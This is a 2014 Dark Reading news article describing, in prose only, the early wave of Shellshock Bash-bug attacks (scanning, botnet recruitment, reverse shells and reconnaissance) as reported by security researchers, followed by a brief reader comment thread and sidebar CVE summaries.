Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Attacks/Breaches

9/29/2014
01:30 PM
Connect Directly
Twitter
RSS
E-Mail
50%
50%

Making Sense Of Shellshock Attack Chaos

Attacks against the Bash bug increase in volume and variety, with an emphasis on information gathering and botnet building.

As security teams reel from last week's Shellshock headlines, attackers are catching on quickly to the vulnerability. Exploits have rapidly come out of the woodwork. Researchers immediately warned this major vulnerability in Bash would likely have a much worse impact than Heartbleed, considering the severity of the exploit and its pervasive presence in so many Linux and UNIX systems. The resulting attacks are starting to crystallize their picture of the threat.

"Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it," according to a post by Johannes Ullrich, director of the SANS Internet Storm Center. Ullrich reports a number of different attacks, including vulnerability checks using multiple headers and simple vulnerability checks using custom user agents.

According to Incapsula research released Friday, in just 24 hours, it recorded 17,400 attacks against its WAF installed base, lashing out at approximately 1,800 domains. The attacks are originating from 400 unique IP addresses, with more than half of them in China or the US. Researchers have noted not only an increasing volume of attacks, but also a growing variety of ways attackers are leveraging the Bash bug to commandeer web servers.

For example, Kaspersky Lab's Stefan Ortloff detailed two attacks. One, known as a reverse-connect-shell, will "just create a new instance of bash and redirect it to a remote server listening on a specific TCP port." The other uses specially crafted HTTP-requests to start installing Linux backdoors on victims' servers.

However, much of the early criminal activity seems to center on the bad guys building up their botnets using the newly discovered vulnerability.

"What we are seeing here are hackers using existing botnets to create new ones: running automated scripts from compromised servers to add more hijacked machines to their 'flock,'" Ofer Gayer, a researcher for Incapsula, explained in a blog post. "During the last 24 hours we saw several botnet shepherds using repurposed DDoS bots in an attempt to exploit Shellshock vulnerability to gain server access."

This has been confirmed by researchers in Italy, who report that a botnet called wopbot running on Linux servers went to work last week DDoSing Akamai's content delivery network and running large-scale scans against the US Department of Defense for "brute force attack purposes," according to researchers at Kaspersky. And researchers at FireEye ran down a laundry list of exploitation techniques already seen in Shellshock traffic. They include automated click fraud, password stealing, and backdoor installation, with payloads that include reverse shell Perl scripts, UDP flood attacks, and IRC-based DDoS.

"The Shellshock traffic we have been able to observe is still quite chaotic," writes James Bennett of FireEye. "It is largely characterized by high volume automated scans and PoC-like exploit scripts."

Meantime, researchers at TrendMicro wrote this morning of an attack they followed against a Chinese financial institution that should give security teams pause. Attackers in that instance were simply trying to see if several IPs owned by the institution were vulnerable to the Shellshock bug.

"Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to the use the command '/bin/uname -a.' The command 'uname' displays system information, including the OS platform, the machine type, and the processor information," Trend researchers wrote. "At first glance, retrieving system information might seem harmless. But as we mentioned before, the information-gathering could possibly be a sign of preparation for more damaging routines."

This kind of early attack could be laying the groundwork for future attacks -- and it is looking like it is not an isolated incident of attack reconnaissance.

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Marilyn Cohodas
50%
50%
Marilyn Cohodas,
User Rank: Strategist
9/30/2014 | 4:20:19 PM
Re: Hopefully this won't amount to a big deal.
Mine too :-)
Robert McDougal
50%
50%
Robert McDougal,
User Rank: Ninja
9/30/2014 | 4:08:40 PM
Re: Hopefully this won't amount to a big deal.
That is definitely my mantra!
Marilyn Cohodas
50%
50%
Marilyn Cohodas,
User Rank: Strategist
9/29/2014 | 4:48:36 PM
Re: Hopefully this won't amount to a big deal.
I hope you are right, Robert. I think the best strategy is hope for the best, plan for the worst! 
Robert McDougal
50%
50%
Robert McDougal,
User Rank: Ninja
9/29/2014 | 4:41:44 PM
Hopefully this won't amount to a big deal.
I am hoping that Shellshock will not live up to the hype.  So far, this bug doesn't seem to be as bad or rampant as Heartbleed.  Not to say that Shellshock isn't a bug that we need to pay attention to, but it doesn't seem to be as devastating as previously thought.
5 Ways to Up Your Threat Management Game
Wayne Reynolds, Advisory CISO, Kudelski Security,  2/26/2020
Exploitation, Phishing Top Worries for Mobile Users
Robert Lemos, Contributing Writer,  2/28/2020
Kr00k Wi-Fi Vulnerability Affected a Billion Devices
Robert Lemos, Contributing Writer,  2/26/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
6 Emerging Cyber Threats That Enterprises Face in 2020
This Tech Digest gives an in-depth look at six emerging cyber threats that enterprises could face in 2020. Download your copy today!
Flash Poll
State of Cybersecurity Incident Response
State of Cybersecurity Incident Response
Data breaches and regulations have forced organizations to pay closer attention to the security incident response function. However, security leaders may be overestimating their ability to detect and respond to security incidents. Read this report to find out more.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2015-3006
PUBLISHED: 2020-02-28
On the QFX3500 and QFX3600 platforms, the number of bytes collected from the RANDOM_INTERRUPT entropy source when the device boots up is insufficient, possibly leading to weak or duplicate SSH keys or self-signed SSL/TLS certificates. Entropy increases after the system has been up and running for so...
CVE-2015-5361
PUBLISHED: 2020-02-28
Background For regular, unencrypted FTP traffic, the FTP ALG can inspect the unencrypted control channel and open related sessions for the FTP data channel. These related sessions (gates) are specific to source and destination IPs and ports of client and server. The design intent of the ftps-extensi...
CVE-2020-6803
PUBLISHED: 2020-02-28
An open redirect is present on the gateway's login page, which could cause a user to be redirected to a malicious site after logging in.
CVE-2020-6804
PUBLISHED: 2020-02-28
A reflected XSS vulnerability exists within the gateway, allowing an attacker to craft a specialized URL which could steal the user's authentication token. When combined with CVE-2020-6803, an attacker could fully compromise the system.
CVE-2019-4301
PUBLISHED: 2020-02-28
BigFix Self-Service Application (SSA) is vulnerable to arbitrary code execution if Javascript code is included in Running Message or Post Message HTML.